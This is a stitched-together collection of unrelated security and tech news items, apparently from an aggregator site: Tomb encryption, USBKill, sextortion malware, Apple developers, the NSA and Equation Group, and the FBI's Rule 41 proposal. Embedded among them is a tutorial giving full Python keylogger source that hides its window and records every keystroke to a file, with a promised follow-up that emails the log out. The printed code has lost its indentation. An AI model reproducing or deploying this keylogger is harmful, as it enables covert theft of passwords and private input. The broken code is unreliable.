Tomb, a Successor To TrueCrypt For Linux Geeks

Original Article 
from the tomb-is-a-nice-friendly-word dept.

jaromil writes:

Last day we released Tomb version 2.1 with improvements to stability, documentation and translations. Tomb is just a ZSh script wrapping around cryptsetup, gpg and other tools to facilitate the creation and management of LUKS encrypted volumes with features like key separation, steganography, off-line search, QRcode paper backups etc. In designing Tomb we struggle for minimalism and readability, convinced that the increasing complexity of personal technology is the root of many vulnerabilities the world is witnessing today — and this approach turns out to be very successful, judging from the wide adoption, appreciation and contributions our project has received especially after the demise of TrueCrypt.
As maintainer of the software I wonder what Slashdot readers think about what we are doing, how we are doing it and more in general about the need for simplicity in secure systems, a debate I perceive as transversal to many other GNU/Linux/BSD projects and their evolution. Given the increasing responsibility in maintaining such a software, considering the human-interface side of things is an easy to reach surface of attack, I can certainly use some advice and criticism.

Posted by timothy 2 days ago

USBKill turns thumb drives into computer kill switches

original article 

A coder that goes by the online handle “Hephaestos” has shared with the world a Python script that, when put on an USB thumb drive, turns the device in an effective kill switch for the computer in which it’s plugged in.


USBkill, as the programmer dubbed it, “waits for a change on your USB ports, then immediately kills your computer.”

The device would be useful “in case the police comes busting in, or steals your laptop from you when you are at a public library (as with Ross [Ulbricht]),” Hephaestos explained. 

Using a cord to attach the USB key to one’s wrist will assure that the USB is removed instantly with a quick tug upon the arrest of the user or the seizure of the computer. 

Of course, if the user doesn’t use full disk encryption in the first place, the device becomes useless.

Hephaestos says that USBkill is still in the early stages, but that it works, and works well.



http://platform.twitter.com/widgets/follow_button.95466a0b743d88fdf27be4b6df8e2945.en.html#_=1430956117971&dnt=false&id=twitter-widget-0&lang=en&screen_name=zeljkazorz&show_count=false&show_screen_name=true&size=l

Trend Micro: Hackers Using Android App For Sextortion   

 

Researchers found that the extortionists first lure their victims through a number of online chatting tools   
Saturday, March 28, 2015:  Security software company Trend Micro has come up with a new finding in which they detected that criminals have developed advanced mobile applications and tools that siphon their victims’ online passwords and contacts to increase the chance that they will pay up.

In a latest report ‘sextortion in the far east’, Trend Micro’s researchers detailed a new Android app that criminals are using to pressure their victims into blackmail.

Sextortion is the act of coercing cybercrime victims to perform sexual favors or to pay large amounts of money in exchange for the non-exposure of their explicit images, videos, or conversations.

Cybercriminals lure, record, and threaten their victims online, which includes a mobile malware component. During their chat or Skype session, cybercriminals convince victims to install a data stealer or disguised Android malware that steals victim data off their device. Cybercriminals can then threaten their victims with the possibility of sending the explicit content to their victim’s contact list. The malware these cybercriminals used are persistent and exhibit various intrusive behaviors.

Researchers found that the extortionists first lure their victims through a number of online chatting tools. Once the trap is set, they feign audio or messaging problems to persuade their target to download one of four malicious Android apps. Using their email, social media and bank accounts, Trend Micro traced several of the Android app developers and their money go-betweens to China.

The company found evidence that the criminals opened different bank accounts for each extortion campaign, which typically, lasted for a few weeks. 

Sushma rani, EFYTIMES News Network 

How To Make A Python KeyloggerPosted by  Ivan Blazevic in Articles, Programming, Python

This is tutorial that explains how to make simple keylogger that records keystrokes activities on pc and store it in .txt file. To make our keylogger we’ll use python. Why python? Python is simple powerfull and flexible programming language. By my opinion the best ,with few lines of code you can do amazing things.If you never used python , read my previous article How To Create Your First Python Program where I explained how to run simple “Hello World” script .

To make programming easier python has “Modules” that contains useful code that can extend python functionalities.
For python keylogger we’ll need to download pywin32 & pyHook modules

Step 1

Download and install pywin32 from this LINK 

pywin32

Step 2

Download and install pyhook from this LINK 

pyhook

Step 3

Launch IDLE python as Administrator and click on FIle -> New Window

idle python

new windows

Here is complete keylogger code , described with comments :
Python Keylogger Code :

 

Source code    
import win32api
import win32console
import win32gui
import pythoncom,pyHook
 
win=win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)
 
def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)
if event.Ascii !=0 or 8:
#open output.txt to read current keystrokes
f=open('c:\output.txt','r+')
buffer=f.read()
f.close()
#open output.txt to write current + new keystrokes
f=open('c:\output.txt','w')
keylogs=chr(event.Ascii)
if event.Ascii==13:
keylogs='/n'
buffer+=keylogs
f.write(buffer)
f.close()
# create a hook manager object
hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()

In the new window copy paste python keylogger code and click on Run -> Run Module .

kezlogger run

After this your keylogger will be launched and all keystroke activity will be stored in ‘c:\output.txt’. In the next tutorial we’ll extend python keylogger with fonctionality that send “output.txt” to specific email address. You can found keylogger code on my github account https://github.com/blaz1988/keylogger/blob/master/keylogger.py

If you’re loking for more poerful keylogger check out  Facebook Keylogger

PC Hacks Article

 

Developers and the Fear of Applefrom the think-different-except-about-us dept.

An anonymous reader writes: UI designer Eli Schiff has posted an article about the “climate of fear” surrounding Apple in the software development community. He points out how developers who express criticism in an informal setting often recant when their words are being recorded, and how even moderate public criticism is often prefaced by flattery and endorsements. 

Beyond that, the industry has learned that they can’t rely on Apple’s walled garden to make a profit. The opaque app review process, the race to the bottom on pricing, and Apple’s resistance to curation of the App Store are driving “independent app developers into larger organizations and venture-backed startups.” Apple is also known to cut contact with developers if they release for Android first. The “climate of fear” even affects journalists, who face not only stonewalling from Apple after negative reporting, but also a brigade of Apple fans and even other journalists trying to paint them as anti-Apple.

New Evidence Strengthens NSA Ties To Equation Group Malware

from the tax-funded-hacks dept.
An anonymous reader writes:When researchers from Kaspersky Lab presented the Equation Group espionage malware, many in the security community were convinced it was part of an NSA operation. Now, Kaspersky has released new evidence that only strengthens those suspicions. In a code sample, they found a string named BACKSNARF_AB25, which happens to be the name of a project in the NSA’s Tailored Access Operations. Further, when examining the metadata on the malware files, they found the modification timestamps were almost always consistent with an 8-5 workday in the UTC-3 or UTC-4 timezones, consistent with work based in the eastern United States. The authors also tended to work Monday through Friday, and not on the weekends, suggesting a large, organized development team. “Whereas before the sprawling Equation Drug platform was known to support 35 different modules, Kaspersky has recently unearthed evidence there are 115 separate plugins. The architecture resembles a mini operating system with kernel- and user-mode components alike.”ORIGINAL ARTICLE 

FBI Seeks To Legally Hack You If You’re Connected To TOR Or a VPN

Law would allow law enforcement to search electronic data if target computer location has been hidden through Tor or VPN

2015/01/img_2530.jpg
Original Article

by NICOLE KARDELL | FEE | JANUARY 20, 2015

The FBI wants to search through your electronic life. You may think it’s a given that the government is in the business of collecting everyone’s personal data — Big Brother run amok in defiance of the Constitution. But under the limits of the Fourth Amendment, nothing it finds can be used to prosecute its targets. Now the FBI is taking steps to carry out broad searches and data collection under the color of authority, making all of us more vulnerable to “fishing expeditions.”

The investigative arm of the Department of Justice is attempting to short-circuit the legal checks of the Fourth Amendment by requesting a change in the Federal Rules of Criminal Procedure. These procedural rules dictate how law enforcement agencies must conduct criminal prosecutions, from investigation to trial. Any deviations from the rules can have serious consequences, including dismissal of a case. The specific rule the FBI is targeting outlines the terms for obtaining a search warrant.

It’s called Federal Rule 41(b), and the requested change would allow law enforcement to obtain a warrant to search electronic data without providing any specific details as long as the target computer location has been hidden through a technical tool like Tor or a virtual private network. It would also allow nonspecific search warrants where computers have been intentionally damaged (such as through botnets, but also through common malware and viruses) and are in five or more separate federal judicial districts. Furthermore, the provision would allow investigators to seize electronically stored information regardless of whether that information is stored inside or outside the court’s jurisdiction.

The change may sound like a technical tweak, but it is a big leap from current procedure. As it stands, Rule 41(b) only allows (with few exceptions) a court to issue a warrant for people or property within that court’s district. The federal rules impose this location limitation — along with requirements that the agent specifically identify the person and place to be searched, find probable cause, and meet other limiting factors — to reduce the impact an investigation could have on people’s right to privacy. Now the FBI is asking for the authority to hack into and search devices without identifying any of the essential whos, whats, wheres, or whys — giving the FBI the authority to search your computer, tablet, or smartphone even if you are in no way suspected of a crime.

All you have to do is cross the FBI’s virtual path. For instance, the proposed amendment would mean that agents could use tactics like creating online “watering holes” to attract their targets. Anyone who clicked on law enforcement’s false-front website would download the government malware and expose their electronic device to an agent’s search (and also expose the device to follow-on hackers). One obvious target for this strategy is any forum that attracts government skeptics and dissenters — FEE.org, for example. Such tactics could inadvertently impact thousands of people who aren’t investigation targets.

This sort of sweeping authority is in obvious conflict with the Constitution. The Fourth Amendment makes it clear that the government cannot legally search your house or your personal effects, including your electronic devices, without (1) probable cause of a suspected crime (2) defined in a legal document (generally, a search warrant issued by a judge) (3) that specifically identifies what is to be searched and what is to be seized.

The FBI is not the first government agency to find itself challenged by the plain language of the Fourth Amendment. Past overreach has required judges and Congress to clarify what constitutes a legal search and seizure in particular contexts. In the 1960s, when electronic eavesdropping (via wiretaps and bugs) came about, Congress established the Omnibus Crime Control and Safe Streets Act of 1968 (the Wiretap Act). The law addressed concerns about these new surreptitious and invasive investigative tactics and provided several strictures on legal searches via wiretap or bug. Since covert investigative tools can be hard to detect, it was important to institute more rigorous standards to keep agents in line.

The same concerns that Congress addressed in the 1960s are present today, but they take on far greater significance. With our growing reliance on electronic devices to communicate with others, to transact business, to shop, travel, date, and store the details of our private lives, these devices are becoming our most important personal effects. The ability of government actors to enter our digital space and search our electronic data is a major privacy concern that must be checked by Fourth Amendment standards. As the Supreme Court recently pronounced in Riley v. California, the search of a modern electronic device such as a smartphone or computer is more intrusive to privacy than even “the most exhaustive search of a house.”

What seems most troubling, though, is that the FBI is attempting to override the Fourth Amendment, along with the body of law developed over the years to reign in surveillance powers, through a relatively obscure forum. Instead of seeking congressional authority or judicial clarification, it has sought a major power grab through a procedural rule tweak — a tweak that would do away with jurisdictional limitations and specificity requirements, among other important checks on law enforcement. The request seems objectively — and constitutionally — offensive.